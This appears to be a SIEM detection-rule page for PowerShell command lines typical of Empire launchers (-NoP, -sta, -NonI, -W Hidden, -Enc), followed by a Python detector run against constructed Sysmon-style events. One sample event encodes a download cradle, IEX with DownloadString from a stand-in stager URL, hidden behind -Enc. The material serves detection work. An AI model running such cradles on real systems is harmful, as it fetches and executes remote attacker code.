
Summary
This detection rule targets PowerShell command lines that carry the parameter combinations commonly used by the launchers of Empire, a post-exploitation framework popular with threat actors. It monitors the 'process_creation' log category on Windows for powershell.exe instances started with abbreviated switches that suppress the profile and the interactive console, hide the window and pass the payload as a Base64-encoded (UTF-16LE) string: '-NoP' (NoProfile), '-sta' (single-threaded apartment), '-NonI' (NonInteractive), '-W Hidden' (WindowStyle Hidden) and '-Enc' (EncodedCommand). Each of these switches is harmless on its own; the rule's selection lists specific combinations of them and raises an alert when one of those combinations appears in the command line arguments, because that pattern is characteristic of stealthy payload execution. Legitimate administration and automation tooling can produce the same combinations, so false positives are possible, and benign and malicious uses cannot be separated on the command line alone: analysts should decode the encoded command and examine the parent process before escalating.
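The following is an added example, not the rule's own logic or code from the Empire project: a small Python detector that applies the shape of selection described above to constructed Sysmon-style process-creation events, then decodes the '-Enc' payload for triage. The parameter combinations, field names, file paths, URL and sample events are all constructed for the example and are not the rule's exact selection list.

```python
"""Detection logic modelled on the summary above (added example, not the rule itself).

Flags powershell.exe process-creation events whose command line carries one of
several Empire-style abbreviated parameter combinations, then decodes the
Base64/UTF-16LE payload passed via -Enc so an analyst can triage the hit.
"""
import base64
import re
from typing import Optional

# Constructed combinations modelled on the switches the summary names.
# They are an assumption for this example, NOT the rule's exact selection list.
SUSPICIOUS_COMBOS = [
    ("-nop", "-sta", "-noni", "-w", "hidden", "-enc"),
    ("-nop", "-sta", "-w", "1", "-enc"),          # -W 1 is WindowStyle Hidden
    ("-nop", "-noni", "-w", "hidden", "-enc"),
]

# Matches -e / -ec / -enc / -encodedcommand followed by a Base64 blob.
_ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _contains_sequence(tokens, seq) -> bool:
    """True if `seq` occurs as a run of consecutive tokens in `tokens`."""
    n = len(seq)
    return any(tokens[i:i + n] == list(seq) for i in range(len(tokens) - n + 1))


def matches_rule(event: dict) -> bool:
    """Apply the selection: powershell.exe plus one of the token combinations."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\powershell.exe"):      # assumption: Windows PowerShell only
        return False
    tokens = event.get("CommandLine", "").lower().split()
    return any(_contains_sequence(tokens, combo) for combo in SUSPICIOUS_COMBOS)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -Enc: Base64 of the UTF-16LE encoded text."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):       # bad padding / odd byte count
        return None


def run_detection(events) -> list:
    """Return (event index, decoded payload or None) for every alerting event."""
    return [(i, decode_encoded_command(ev.get("CommandLine", "")))
            for i, ev in enumerate(events) if matches_rule(ev)]


def _encode(script: str) -> str:
    """Build a -Enc argument the way PowerShell expects it (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (Sysmon-style field names); the stager URL is a
# TEST-NET address, not a real host.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10:8080/launcher')"
BENIGN = "Get-Service | Where-Object Status -eq Running"
EVENTS = [
    # 0: Empire-style launcher, should alert
    {"Image": _PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"powershell.exe -NoP -sta -NonI -W Hidden -Enc {_encode(PAYLOAD)}"},
    # 1: ordinary scheduled script, no encoded command
    {"Image": _PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    # 2: same intent spelled with long-form switches; abbreviated-token matching misses it
    {"Image": _PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand {_encode(PAYLOAD)}"},
    # 3: the same switches echoed by cmd.exe, wrong image so no alert
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c echo -NoP -sta -NonI -W Hidden -Enc AAAA"},
    # 4: constructed management agent using the same combination: the false positive the rule warns about
    {"Image": _PS, "ParentImage": r"C:\Program Files\ExampleAgent\agent.exe",
     "CommandLine": f"powershell.exe -NoP -NonI -W Hidden -enc {_encode(BENIGN)}"},
]

if __name__ == "__main__":
    for idx, decoded in run_detection(EVENTS):
        print(f"ALERT event {idx}: parent={EVENTS[idx].get('ParentImage')} decoded={decoded!r}")
```

Events 0 and 4 both fire; only the decoded payload and the parent process separate the download cradle from the inventory query, which is the triage step the false-positive note above calls for. Event 2 shows the caveat of matching abbreviated forms: the long-form switches are functionally identical but fall outside the listed combinations, so a detector of this shape should be paired with a broader encoded-command rule.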
Categories
- Endpoint
- Windows
Data Sources
- Process
Created: 2019-04-20